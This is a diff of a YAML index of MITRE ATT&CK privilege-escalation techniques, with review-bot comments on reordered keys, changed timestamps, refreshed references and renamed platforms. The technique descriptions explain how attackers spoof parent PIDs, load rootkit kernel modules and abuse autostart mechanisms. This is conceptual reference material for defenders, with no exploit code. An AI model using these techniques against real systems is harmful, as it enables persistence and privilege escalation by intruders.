+ - 'Active Directory: Active Directory Object Modification'
type: attack-pattern
id: attack-pattern--8a2f40cf-8325-47f9-96e4-b1ca4c7389bd
created: '2020-01-19T16:10:15.008Z'
@@ -19643,10 +19953,18 @@ privilege-escalation:
description: Bellavance, Ned. (2019, July 16). Demystifying Azure AD Service
Principals. Retrieved January 19, 2020.
url: https://nedinthecloud.com/2019/07/16/demystifying-azure-ad-service-principals/
+ - source_name: Lacework AI Resource Hijacking 2024
+ description: Detecting AI resource-hijacking with Composite Alerts. (2024,
+ June 6). Lacework Labs. Retrieved July 1, 2024.
+ url: https://www.lacework.com/blog/detecting-ai-resource-hijacking-with-composite-alerts
- source_name: GCP SSH Key Add
description: Google. (n.d.). gcloud compute os-login ssh-keys add. Retrieved
October 1, 2020.
url: https://cloud.google.com/sdk/gcloud/reference/compute/os-login/ssh-keys/add
+ - source_name: Permiso Scattered Spider 2023
+ description: 'Ian Ahl. (2023, September 20). LUCR-3: SCATTERED SPIDER GETTING
+ SAAS-Y IN THE CLOUD. Retrieved September 25, 2023.'
+ url: https://permiso.io/blog/lucr-3-scattered-spider-getting-saas-y-in-the-cloud
- source_name: Blue Cloud of Death Video
description: 'Kunz, Bruce. (2018, October 14). Blue Cloud of Death: Red Teaming
Azure. Retrieved November 21, 2019.'
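Review bot: the new `Lacework AI Resource Hijacking 2024` entry puts the title before the author (`Detecting AI resource-hijacking with Composite Alerts. (2024, June 6). Lacework Labs.`), whereas every other entry in this block is author-first (`Google. (n.d.). gcloud compute os-login ssh-keys add.`). If the text is copied from upstream ATT&CK it should be corrected there; otherwise reorder it to `Lacework Labs. (2024, June 6). Detecting AI resource-hijacking with Composite Alerts.`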
@@ -19655,10 +19973,20 @@ privilege-escalation:
description: 'Kunz, Bryce. (2018, May 11). Blue Cloud of Death: Red Teaming
Azure. Retrieved October 23, 2019.'
url: https://speakerdeck.com/tweekfawkes/blue-cloud-of-death-red-teaming-azure-1
+ - source_name: Microsoft Entra ID App Passwords
+ description: Microsoft. (2023, October 23). Enforce Microsoft Entra multifactor
+ authentication with legacy applications using app passwords. Retrieved May
+ 28, 2024.
+ url: https://learn.microsoft.com/en-us/entra/identity/authentication/howto-mfa-app-passwords
- source_name: Microsoft SolarWinds Customer Guidance
description: MSRC. (2020, December 13). Customer Guidance on Recent Nation-State
Cyber Attacks. Retrieved December 17, 2020.
url: https://msrc-blog.microsoft.com/2020/12/13/customer-guidance-on-recent-nation-state-cyber-attacks/
+ - source_name: Mandiant APT42 Operations 2024
+ description: 'Ofir Rozmann, Asli Koksal, Adrian Hernandez, Sarah Bock, and
+ Jonathan Leathery. (2024, May 1). Uncharmed: Untangling Iran''s APT42 Operations.
+ Retrieved May 28, 2024.'
+ url: https://cloud.google.com/blog/topics/threat-intelligence/untangling-iran-apt42-operations
- source_name: Expel Behind the Scenes
description: 'S. Lipton, L. Easterly, A. Randazzo and J. Hencinski. (2020,
July 28). Behind the scenes in the Expel SOC: Alert-to-fix in AWS. Retrieved
@@ -19675,9 +20003,6 @@ privilege-escalation:
url: https://rhinosecuritylabs.com/aws/aws-privilege-escalation-methods-mitigation/
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- x_mitre_attack_spec_version: 3.2.0
- x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1098.001
atomic_tests: []
T1134.003:
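Review bot: of the three keys removed at the end of T1098.001 here, `x_mitre_attack_spec_version: 3.2.0` and `x_mitre_modified_by_ref` are re-added higher in the same object by the earlier hunks (after `kill_chain_phases` and after `x_mitre_is_subtechnique`), so the net effect for those two is a key move rather than a removal, and only `spec_version` actually disappears. Emitting keys in a stable order from the generator would keep future regenerations to the real content changes and make hunks like this one reviewable at a glance.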
@@ -19741,7 +20066,6 @@ privilege-escalation:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
atomic_tests: []
T1546.003:
technique:
@@ -19830,7 +20154,6 @@ privilege-escalation:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1546.003
atomic_tests: []
T1134.004:
@@ -19888,7 +20211,7 @@ privilege-escalation:
Adversaries may abuse these mechanisms to evade defenses, such as those blocking processes spawning directly from Office documents, and analysis targeting unusual/potentially malicious parent-child process relationships, such as spoofing the PPID of [PowerShell](https://attack.mitre.org/techniques/T1059/001)/[Rundll32](https://attack.mitre.org/techniques/T1218/011) to be explorer.exe
rather than an Office document delivered as part of [Spearphishing Attachment](https://attack.mitre.org/techniques/T1566/001).(Citation: CounterCept PPID Spoofing Dec 2018) This spoofing could be executed via [Visual Basic](https://attack.mitre.org/techniques/T1059/005) within a malicious Office document or any code that can perform [Native API](https://attack.mitre.org/techniques/T1106).(Citation: CTD PPID Spoofing Macro Mar 2019)(Citation: CounterCept PPID Spoofing Dec 2018)
Explicitly assigning the PPID may also enable elevated privileges given appropriate access rights to the parent process. For example, an adversary in a privileged user context (i.e. administrator) may spawn a new process and assign the parent as a process running as SYSTEM (such as lsass.exe
), causing the new process to be elevated via the inherited access token.(Citation: XPNSec PPID Nov 2017)
- modified: '2022-05-24T14:00:00.188Z'
+ modified: '2022-05-03T02:15:42.360Z'
created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
name: 'Access Token Manipulation: Parent PID Spoofing'
x_mitre_detection: |-
@@ -19913,12 +20236,11 @@ privilege-escalation:
- Host Forensic Analysis
x_mitre_attack_spec_version: 2.1.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1134.004
atomic_tests: []
T1546.001:
technique:
- modified: '2023-05-09T14:00:00.188Z'
+ modified: '2024-09-12T15:27:11.065Z'
name: 'Event Triggered Execution: Change Default File Association'
description: "Adversaries may establish persistence by executing malicious content
triggered by a file type association. When a file is opened, the default program
@@ -19944,7 +20266,6 @@ privilege-escalation:
phase_name: privilege-escalation
- kill_chain_name: mitre-attack
phase_name: persistence
- x_mitre_attack_spec_version: 2.1.0
x_mitre_contributors:
- Travis Smith, Tripwire
- Stefan Kanthak
@@ -19958,7 +20279,6 @@ privilege-escalation:
x_mitre_domains:
- enterprise-attack
x_mitre_is_subtechnique: true
- x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
x_mitre_platforms:
- Windows
x_mitre_version: '1.0'
@@ -19985,8 +20305,8 @@ privilege-escalation:
url: https://support.microsoft.com/en-us/help/18539/windows-7-change-default-programs
- source_name: Microsoft File Handlers
description: Microsoft. (n.d.). Specifying File Handlers for File Name Extensions.
- Retrieved November 13, 2014.
- url: http://msdn.microsoft.com/en-us/library/bb166549.aspx
+ Retrieved September 12, 2024.
+ url: https://learn.microsoft.com/en-us/previous-versions/visualstudio/visual-studio-2015/extensibility/specifying-file-handlers-for-file-name-extensions?view=vs-2015
- source_name: Microsoft Assoc Oct 2017
description: Plett, C. et al.. (2017, October 15). assoc. Retrieved August
7, 2018.
@@ -19997,7 +20317,8 @@ privilege-escalation:
url: https://www.trendmicro.com/vinfo/us/threat-encyclopedia/malware/troj_fakeav.gzd
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- spec_version: '2.1'
+ x_mitre_attack_spec_version: 3.2.0
+ x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
identifier: T1546.001
atomic_tests: []
T1055.014:
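Review bot: for T1546.001 the `x_mitre_attack_spec_version` bump from 2.1.0 (removed in the earlier hunk) to 3.2.0 here is a genuine change and is consistent with the 2024-09-12 `modified` stamp and the refreshed `Microsoft File Handlers` URL, but the `x_mitre_modified_by_ref` line is removed above and re-added here unchanged, which is pure reordering. The refreshed reference now points at a `previous-versions` Visual Studio 2015 page; that is the current home of the document, but the retrieval date is the only thing that tells a reader it was re-verified, so keep that date accurate.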
@@ -20068,7 +20389,7 @@ privilege-escalation:
resources, and possibly elevated privileges. Execution via VDSO hijacking
may also evade detection from security products since the execution is masked
under a legitimate process. "
- modified: '2022-11-08T14:00:00.188Z'
+ modified: '2022-07-07T17:09:09.048Z'
created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
name: VDSO Hijacking
x_mitre_detection: "Monitor for malicious usage of system calls, such as ptrace
@@ -20095,7 +20416,6 @@ privilege-escalation:
- Application control
x_mitre_attack_spec_version: 2.1.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
atomic_tests: []
T1546.014:
technique:
@@ -20135,7 +20455,7 @@ privilege-escalation:
The rule files are in the plist format and define the name, event type, and action to take. Some examples of event types include system startup and user authentication. Examples of actions are to run a system command or send an email. The emond service will not launch if there is no file present in the QueueDirectories path /private/var/db/emondClients
, specified in the [Launch Daemon](https://attack.mitre.org/techniques/T1543/004) configuration file at/System/Library/LaunchDaemons/com.apple.emond.plist
.(Citation: xorrior emond Jan 2018)(Citation: magnusviri emond Apr 2016)(Citation: sentinelone macos persist Jun 2019)
Adversaries may abuse this service by writing a rule to execute commands when a defined event occurs, such as system start up or user authentication.(Citation: xorrior emond Jan 2018)(Citation: magnusviri emond Apr 2016)(Citation: sentinelone macos persist Jun 2019) Adversaries may also be able to escalate privileges from administrator to root as the emond service is executed with root privileges by the [Launch Daemon](https://attack.mitre.org/techniques/T1543/004) service.
- modified: '2022-05-11T14:00:00.188Z'
+ modified: '2022-04-20T00:16:01.732Z'
created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
name: 'Event Triggered Execution: Emond'
x_mitre_detection: Monitor emond rules creation by checking for files created
@@ -20155,12 +20475,11 @@ privilege-escalation:
- Administrator
x_mitre_attack_spec_version: 2.1.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1546.014
atomic_tests: []
T1574.010:
technique:
- modified: '2023-05-09T14:00:00.188Z'
+ modified: '2023-03-30T21:01:37.026Z'
name: Services File Permissions Weakness
description: |-
Adversaries may execute their own malicious payloads by hijacking the binaries used by services. Adversaries may use flaws in the permissions of Windows services to replace the binary that is executed upon service start. These service processes may automatically execute specific binaries as part of their functionality or to perform other actions. If the permissions on the file system directory containing a target binary, or permissions on the binary itself are improperly set, then the target binary may be overwritten with another binary using user-level permissions and executed by the original process. If the original process and thread are running under a higher permissions level, then the replaced binary will also execute under higher-level permissions, which could include SYSTEM.
@@ -20214,11 +20533,10 @@ privilege-escalation:
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.1.0
- spec_version: '2.1'
atomic_tests: []
T1547.001:
technique:
- modified: '2023-10-16T09:08:22.319Z'
+ modified: '2024-09-12T15:27:58.051Z'
name: 'Boot or Logon Autostart Execution: Registry Run Keys / Startup Folder'
description: |-
Adversaries may achieve persistence by adding a program to a startup folder or referencing it with a Registry run key. Adding an entry to the "run keys" in the Registry or startup folder will cause the program referenced to be executed when a user logs in.(Citation: Microsoft Run Key) These programs will be executed under the context of the user and will have the account's associated permissions level.
@@ -20305,9 +20623,9 @@ privilege-escalation:
in the Registry. Retrieved August 3, 2020.
url: https://docs.microsoft.com/en-us/windows/win32/sysinfo/32-bit-and-64-bit-application-data-in-the-registry
- source_name: Microsoft Run Key
- description: Microsoft. (n.d.). Run and RunOnce Registry Keys. Retrieved November
- 12, 2014.
- url: http://msdn.microsoft.com/en-us/library/aa376977
+ description: Microsoft. (n.d.). Run and RunOnce Registry Keys. Retrieved September
+ 12, 2024.
+ url: https://learn.microsoft.com/en-us/windows/win32/setupapi/run-and-runonce-registry-keys
- source_name: Oddvar Moe RunOnceEx Mar 2018
description: Moe, O. (2018, March 21). Persistence using RunOnceEx - Hidden
from Autoruns.exe. Retrieved June 29, 2018.
@@ -20320,12 +20638,11 @@ privilege-escalation:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1547.001
atomic_tests: []
T1098:
technique:
- modified: '2024-01-16T22:24:38.234Z'
+ modified: '2024-10-15T15:35:57.382Z'
name: Account Manipulation
description: "Adversaries may manipulate accounts to maintain and/or elevate
access to victim systems. Account manipulation may consist of any action that
@@ -20361,16 +20678,15 @@ privilege-escalation:
x_mitre_is_subtechnique: false
x_mitre_platforms:
- Windows
- - Azure AD
- - Office 365
- IaaS
- Linux
- macOS
- - Google Workspace
- SaaS
- Network
- Containers
- x_mitre_version: '2.6'
+ - Office Suite
+ - Identity Provider
+ x_mitre_version: '2.7'
x_mitre_data_sources:
- 'Command: Command Execution'
- 'Process: Process Creation'
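Review bot: the T1098 platform list replaces Azure AD, Office 365 and Google Workspace with the consolidated Office Suite and Identity Provider names and bumps x_mitre_version to 2.7. Anything that filters this index by platform string (per-platform index files, test selectors) will silently stop matching the three removed names; grep the generators for the old literals before merging.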
@@ -20411,143 +20727,141 @@ privilege-escalation:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1098
atomic_tests: []
T1547.006:
technique:
- x_mitre_platforms:
- - macOS
- - Linux
- x_mitre_domains:
- - enterprise-attack
+ modified: '2024-09-12T17:30:54.170Z'
+ name: 'Boot or Logon Autostart Execution: Kernel Modules and Extensions'
+ description: |-
+ Adversaries may modify the kernel to automatically execute programs on system boot. Loadable Kernel Modules (LKMs) are pieces of code that can be loaded and unloaded into the kernel upon demand. They extend the functionality of the kernel without the need to reboot the system. For example, one type of module is the device driver, which allows the kernel to access hardware connected to the system.(Citation: Linux Kernel Programming)
+
+ When used maliciously, LKMs can be a type of kernel-mode [Rootkit](https://attack.mitre.org/techniques/T1014) that run with the highest operating system privilege (Ring 0).(Citation: Linux Kernel Module Programming Guide) Common features of LKM based rootkits include: hiding itself, selective hiding of files, processes and network activity, as well as log tampering, providing authenticated backdoors, and enabling root access to non-privileged users.(Citation: iDefense Rootkit Overview)
+
+ Kernel extensions, also called kext, are used in macOS to load functionality onto a system similar to LKMs for Linux. Since the kernel is responsible for enforcing security and the kernel extensions run as apart of the kernel, kexts are not governed by macOS security policies. Kexts are loaded and unloaded through kextload
and kextunload
commands. Kexts need to be signed with a developer ID that is granted privileges by Apple allowing it to sign Kernel extensions. Developers without these privileges may still sign kexts but they will not load unless SIP is disabled. If SIP is enabled, the kext signature is verified before being added to the AuxKC.(Citation: System and kernel extensions in macOS)
+
+ Since macOS Catalina 10.15, kernel extensions have been deprecated in favor of System Extensions. However, kexts are still allowed as "Legacy System Extensions" since there is no System Extension for Kernel Programming Interfaces.(Citation: Apple Kernel Extension Deprecation)
+
+ Adversaries can use LKMs and kexts to conduct [Persistence](https://attack.mitre.org/tactics/TA0003) and/or [Privilege Escalation](https://attack.mitre.org/tactics/TA0004) on a system. Examples have been found in the wild, and there are some relevant open source projects as well.(Citation: Volatility Phalanx2)(Citation: CrowdStrike Linux Rootkit)(Citation: GitHub Reptile)(Citation: GitHub Diamorphine)(Citation: RSAC 2015 San Francisco Patrick Wardle)(Citation: Synack Secure Kernel Extension Broken)(Citation: Securelist Ventir)(Citation: Trend Micro Skidmap)
+ kill_chain_phases:
+ - kill_chain_name: mitre-attack
+ phase_name: persistence
+ - kill_chain_name: mitre-attack
+ phase_name: privilege-escalation
x_mitre_contributors:
- Wayne Silva, F-Secure Countercept
- Anastasios Pingios
- Jeremy Galloway
- Red Canary
- Eric Kaiser @ideologysec
- object_marking_refs:
- - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+ x_mitre_deprecated: false
+ x_mitre_detection: |
+ Loading, unloading, and manipulating modules on Linux systems can be detected by monitoring for the following commands: modprobe
, insmod
, lsmod
, rmmod
, or modinfo
(Citation: Linux Loadable Kernel Module Insert and Remove LKMs) LKMs are typically loaded into /lib/modules
and have had the extension .ko ("kernel object") since version 2.6 of the Linux kernel. (Citation: Wikipedia Loadable Kernel Module)
+
+ Adversaries may run commands on the target system before loading a malicious module in order to ensure that it is properly compiled. (Citation: iDefense Rootkit Overview) Adversaries may also execute commands to identify the exact version of the running Linux kernel and/or download multiple versions of the same .ko (kernel object) files to use the one appropriate for the running system.(Citation: Trend Micro Skidmap) Many LKMs require Linux headers (specific to the target kernel) in order to compile properly. These are typically obtained through the operating systems package manager and installed like a normal package. On Ubuntu and Debian based systems this can be accomplished by running: apt-get install linux-headers-$(uname -r)
On RHEL and CentOS based systems this can be accomplished by running: yum install kernel-devel-$(uname -r)
+
+ On macOS, monitor for execution of kextload
commands and user installed kernel extensions performing abnormal and/or potentially malicious activity (such as creating network connections). Monitor for new rows added in the kext_policy
table. KextPolicy stores a list of user approved (non Apple) kernel extensions and a partial history of loaded kernel modules in a SQLite database, /var/db/SystemPolicyConfiguration/KextPolicy
.(Citation: User Approved Kernel Extension Pike’s)(Citation: Purves Kextpocalypse 2)(Citation: Apple Developer Configuration Profile)
+ x_mitre_domains:
+ - enterprise-attack
+ x_mitre_is_subtechnique: true
+ x_mitre_platforms:
+ - macOS
+ - Linux
+ x_mitre_version: '1.3'
+ x_mitre_data_sources:
+ - 'Command: Command Execution'
+ - 'File: File Creation'
+ - 'File: File Modification'
+ - 'Kernel: Kernel Module Load'
+ - 'Process: Process Creation'
+ x_mitre_permissions_required:
+ - root
type: attack-pattern
id: attack-pattern--a1b52199-c8c5-438a-9ded-656f1d0888c6
created: '2020-01-24T17:42:23.339Z'
- x_mitre_version: '1.3'
+ created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ revoked: false
external_references:
- source_name: mitre-attack
- external_id: T1547.006
url: https://attack.mitre.org/techniques/T1547/006
+ external_id: T1547.006
- source_name: Apple Developer Configuration Profile
- url: https://developer.apple.com/business/documentation/Configuration-Profile-Reference.pdf
description: Apple. (2019, May 3). Configuration Profile Reference. Retrieved
September 23, 2021.
+ url: https://developer.apple.com/business/documentation/Configuration-Profile-Reference.pdf
- source_name: Apple Kernel Extension Deprecation
- url: https://developer.apple.com/support/kernel-extensions/
description: Apple. (n.d.). Deprecated Kernel Extensions and System Extension
Alternatives. Retrieved November 4, 2020.
+ url: https://developer.apple.com/support/kernel-extensions/
- source_name: System and kernel extensions in macOS
- url: https://support.apple.com/guide/deployment/system-and-kernel-extensions-in-macos-depa5fb8376f/web
description: Apple. (n.d.). System and kernel extensions in macOS. Retrieved
March 31, 2022.
+ url: https://support.apple.com/guide/deployment/system-and-kernel-extensions-in-macos-depa5fb8376f/web
- source_name: GitHub Reptile
- url: https://github.com/f0rb1dd3n/Reptile
description: Augusto, I. (2018, March 8). Reptile - LMK Linux rootkit. Retrieved
April 9, 2018.
+ url: https://github.com/f0rb1dd3n/Reptile
- source_name: Volatility Phalanx2
- url: https://volatility-labs.blogspot.com/2012/10/phalanx-2-revealed-using-volatility-to.html
description: 'Case, A. (2012, October 10). Phalanx 2 Revealed: Using Volatility
to Analyze an Advanced Linux Rootkit. Retrieved April 9, 2018.'
+ url: https://volatility-labs.blogspot.com/2012/10/phalanx-2-revealed-using-volatility-to.html
- source_name: iDefense Rootkit Overview
- url: http://www.megasecurity.org/papers/Rootkits.pdf
description: Chuvakin, A. (2003, February). An Overview of Rootkits. Retrieved
- April 6, 2018.
+ September 12, 2024.
+ url: https://www.megasecurity.org/papers/Rootkits.pdf
- source_name: Linux Loadable Kernel Module Insert and Remove LKMs
- url: http://tldp.org/HOWTO/Module-HOWTO/x197.html
description: Henderson, B. (2006, September 24). How To Insert And Remove
LKMs. Retrieved April 9, 2018.
+ url: http://tldp.org/HOWTO/Module-HOWTO/x197.html
- source_name: CrowdStrike Linux Rootkit
- url: https://www.crowdstrike.com/blog/http-iframe-injecting-linux-rootkit/
description: Kurtz, G. (2012, November 19). HTTP iframe Injecting Linux Rootkit.
Retrieved December 21, 2017.
+ url: https://www.crowdstrike.com/blog/http-iframe-injecting-linux-rootkit/
- source_name: GitHub Diamorphine
- url: https://github.com/m0nad/Diamorphine
description: Mello, V. (2018, March 8). Diamorphine - LMK rootkit for Linux
Kernels 2.6.x/3.x/4.x (x86 and x86_64). Retrieved April 9, 2018.
+ url: https://github.com/m0nad/Diamorphine
- source_name: Securelist Ventir
- url: https://securelist.com/the-ventir-trojan-assemble-your-macos-spy/67267/
description: 'Mikhail, K. (2014, October 16). The Ventir Trojan: assemble
your MacOS spy. Retrieved April 6, 2018.'
+ url: https://securelist.com/the-ventir-trojan-assemble-your-macos-spy/67267/
- source_name: User Approved Kernel Extension Pike’s
- url: https://pikeralpha.wordpress.com/2017/08/29/user-approved-kernel-extension-loading/
description: Pikeralpha. (2017, August 29). User Approved Kernel Extension
Loading…. Retrieved September 23, 2021.
+ url: https://pikeralpha.wordpress.com/2017/08/29/user-approved-kernel-extension-loading/
- source_name: Linux Kernel Module Programming Guide
- url: http://www.tldp.org/LDP/lkmpg/2.4/html/x437.html
description: Pomerantz, O., Salzman, P. (2003, April 4). Modules vs Programs.
Retrieved April 6, 2018.
+ url: http://www.tldp.org/LDP/lkmpg/2.4/html/x437.html
- source_name: Linux Kernel Programming
- url: https://www.tldp.org/LDP/lkmpg/2.4/lkmpg.pdf
description: Pomerantz, O., Salzman, P.. (2003, April 4). The Linux Kernel
Module Programming Guide. Retrieved April 6, 2018.
+ url: https://www.tldp.org/LDP/lkmpg/2.4/lkmpg.pdf
- source_name: Trend Micro Skidmap
- url: https://blog.trendmicro.com/trendlabs-security-intelligence/skidmap-linux-malware-uses-rootkit-capabilities-to-hide-cryptocurrency-mining-payload/
description: Remillano, A., Urbanec, J. (2019, September 19). Skidmap Linux
Malware Uses Rootkit Capabilities to Hide Cryptocurrency-Mining Payload.
Retrieved June 4, 2020.
+ url: https://blog.trendmicro.com/trendlabs-security-intelligence/skidmap-linux-malware-uses-rootkit-capabilities-to-hide-cryptocurrency-mining-payload/
- source_name: Purves Kextpocalypse 2
- url: https://richard-purves.com/2017/11/09/mdm-and-the-kextpocalypse-2/
description: Richard Purves. (2017, November 9). MDM and the Kextpocalypse
. Retrieved September 23, 2021.
+ url: https://richard-purves.com/2017/11/09/mdm-and-the-kextpocalypse-2/
- source_name: RSAC 2015 San Francisco Patrick Wardle
- url: https://www.virusbulletin.com/uploads/pdf/conference/vb2014/VB2014-Wardle.pdf
description: Wardle, P. (2015, April). Malware Persistence on OS X Yosemite.
Retrieved April 6, 2018.
+ url: https://www.virusbulletin.com/uploads/pdf/conference/vb2014/VB2014-Wardle.pdf
- source_name: Synack Secure Kernel Extension Broken
- url: https://www.synack.com/2017/09/08/high-sierras-secure-kernel-extension-loading-is-broken/
description: Wardle, P. (2017, September 8). High Sierra’s ‘Secure Kernel
Extension Loading’ is Broken. Retrieved April 6, 2018.
+ url: https://www.synack.com/2017/09/08/high-sierras-secure-kernel-extension-loading-is-broken/
- source_name: Wikipedia Loadable Kernel Module
- url: https://en.wikipedia.org/wiki/Loadable_kernel_module#Linux
description: Wikipedia. (2018, March 17). Loadable kernel module. Retrieved
April 9, 2018.
- x_mitre_deprecated: false
- revoked: false
- description: |-
- Adversaries may modify the kernel to automatically execute programs on system boot. Loadable Kernel Modules (LKMs) are pieces of code that can be loaded and unloaded into the kernel upon demand. They extend the functionality of the kernel without the need to reboot the system. For example, one type of module is the device driver, which allows the kernel to access hardware connected to the system.(Citation: Linux Kernel Programming)
-
- When used maliciously, LKMs can be a type of kernel-mode [Rootkit](https://attack.mitre.org/techniques/T1014) that run with the highest operating system privilege (Ring 0).(Citation: Linux Kernel Module Programming Guide) Common features of LKM based rootkits include: hiding itself, selective hiding of files, processes and network activity, as well as log tampering, providing authenticated backdoors, and enabling root access to non-privileged users.(Citation: iDefense Rootkit Overview)
-
- Kernel extensions, also called kext, are used in macOS to load functionality onto a system similar to LKMs for Linux. Since the kernel is responsible for enforcing security and the kernel extensions run as apart of the kernel, kexts are not governed by macOS security policies. Kexts are loaded and unloaded through kextload
and kextunload
commands. Kexts need to be signed with a developer ID that is granted privileges by Apple allowing it to sign Kernel extensions. Developers without these privileges may still sign kexts but they will not load unless SIP is disabled. If SIP is enabled, the kext signature is verified before being added to the AuxKC.(Citation: System and kernel extensions in macOS)
-
- Since macOS Catalina 10.15, kernel extensions have been deprecated in favor of System Extensions. However, kexts are still allowed as "Legacy System Extensions" since there is no System Extension for Kernel Programming Interfaces.(Citation: Apple Kernel Extension Deprecation)
-
- Adversaries can use LKMs and kexts to conduct [Persistence](https://attack.mitre.org/tactics/TA0003) and/or [Privilege Escalation](https://attack.mitre.org/tactics/TA0004) on a system. Examples have been found in the wild, and there are some relevant open source projects as well.(Citation: Volatility Phalanx2)(Citation: CrowdStrike Linux Rootkit)(Citation: GitHub Reptile)(Citation: GitHub Diamorphine)(Citation: RSAC 2015 San Francisco Patrick Wardle)(Citation: Synack Secure Kernel Extension Broken)(Citation: Securelist Ventir)(Citation: Trend Micro Skidmap)
- modified: '2022-05-11T14:00:00.188Z'
- created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- name: 'Boot or Logon Autostart Execution: Kernel Modules and Extensions'
- x_mitre_detection: |
- Loading, unloading, and manipulating modules on Linux systems can be detected by monitoring for the following commands: modprobe
, insmod
, lsmod
, rmmod
, or modinfo
(Citation: Linux Loadable Kernel Module Insert and Remove LKMs) LKMs are typically loaded into /lib/modules
and have had the extension .ko ("kernel object") since version 2.6 of the Linux kernel. (Citation: Wikipedia Loadable Kernel Module)
-
- Adversaries may run commands on the target system before loading a malicious module in order to ensure that it is properly compiled. (Citation: iDefense Rootkit Overview) Adversaries may also execute commands to identify the exact version of the running Linux kernel and/or download multiple versions of the same .ko (kernel object) files to use the one appropriate for the running system.(Citation: Trend Micro Skidmap) Many LKMs require Linux headers (specific to the target kernel) in order to compile properly. These are typically obtained through the operating systems package manager and installed like a normal package. On Ubuntu and Debian based systems this can be accomplished by running: apt-get install linux-headers-$(uname -r)
On RHEL and CentOS based systems this can be accomplished by running: yum install kernel-devel-$(uname -r)
-
- On macOS, monitor for execution of kextload
commands and user installed kernel extensions performing abnormal and/or potentially malicious activity (such as creating network connections). Monitor for new rows added in the kext_policy
table. KextPolicy stores a list of user approved (non Apple) kernel extensions and a partial history of loaded kernel modules in a SQLite database, /var/db/SystemPolicyConfiguration/KextPolicy
.(Citation: User Approved Kernel Extension Pike’s)(Citation: Purves Kextpocalypse 2)(Citation: Apple Developer Configuration Profile)
- kill_chain_phases:
- - kill_chain_name: mitre-attack
- phase_name: persistence
- - kill_chain_name: mitre-attack
- phase_name: privilege-escalation
- x_mitre_is_subtechnique: true
- x_mitre_data_sources:
- - 'Command: Command Execution'
- - 'File: File Creation'
- - 'File: File Modification'
- - 'Kernel: Kernel Module Load'
- - 'Process: Process Creation'
- x_mitre_permissions_required:
- - root
- x_mitre_attack_spec_version: 2.1.0
+ url: https://en.wikipedia.org/wiki/Loadable_kernel_module#Linux
+ object_marking_refs:
+ - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+ x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1547.006
atomic_tests: []
T1574.013:
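Review bot: nearly all of the 143/141 lines in this hunk are a key reorder of the T1547.006 object (description, detection and references move but keep their text); the only substantive changes are the modified timestamp, the iDefense reference moving to https with a new retrieved date, and x_mitre_attack_spec_version going from 2.1.0 to 3.2.0. Emitting keys in a fixed order from the generator would keep future syncs reviewable. Two things worth a glance while here: the command names in the detection text (modprobe, insmod, lsmod, rmmod, modinfo, kextload) and the /var/db/SystemPolicyConfiguration/KextPolicy path sit on their own lines with the following text starting with a comma or period, which looks like inline markup was lost somewhere between upstream and this file; confirm the committed text renders as intended. The description's "run as apart of the kernel" is upstream wording and not something this sync should edit.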
@@ -20584,7 +20898,7 @@ privilege-escalation:
url: https://docs.microsoft.com/en-us/windows/win32/api/winternl/nf-winternl-ntqueryinformationprocess
description: Microsoft. (2021, November 23). NtQueryInformationProcess function
(winternl.h). Retrieved February 4, 2022.
- modified: '2022-05-11T14:00:00.188Z'
+ modified: '2022-03-22T15:47:33.915Z'
name: KernelCallbackTable
description: |-
Adversaries may abuse the KernelCallbackTable
of a process to hijack its execution flow in order to run their own payloads.(Citation: Lazarus APT January 2022)(Citation: FinFisher exposed ) The KernelCallbackTable
can be found in the Process Environment Block (PEB) and is initialized to an array of graphic functions available to a GUI process once user32.dll
is loaded.(Citation: Windows Process Injection KernelCallbackTable)
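Review bot: the modified timestamp for T1574.013 moves backwards, from 2022-05-11 to 2022-03-22. If the new value is what upstream ATT&CK currently publishes for this object that is fine, but a timestamp that regresses during a sync usually means the previous value was a stale local rewrite or the wrong object was matched; please say which in the commit message. The same regression appears for T1068 later in this file.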
@@ -20610,12 +20924,10 @@ privilege-escalation:
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
x_mitre_data_sources:
- 'Process: OS API Execution'
- spec_version: '2.1'
- x_mitre_attack_spec_version: 2.1.0
atomic_tests: []
T1053.006:
technique:
- modified: '2023-09-08T11:56:26.862Z'
+ modified: '2024-10-15T16:42:51.536Z'
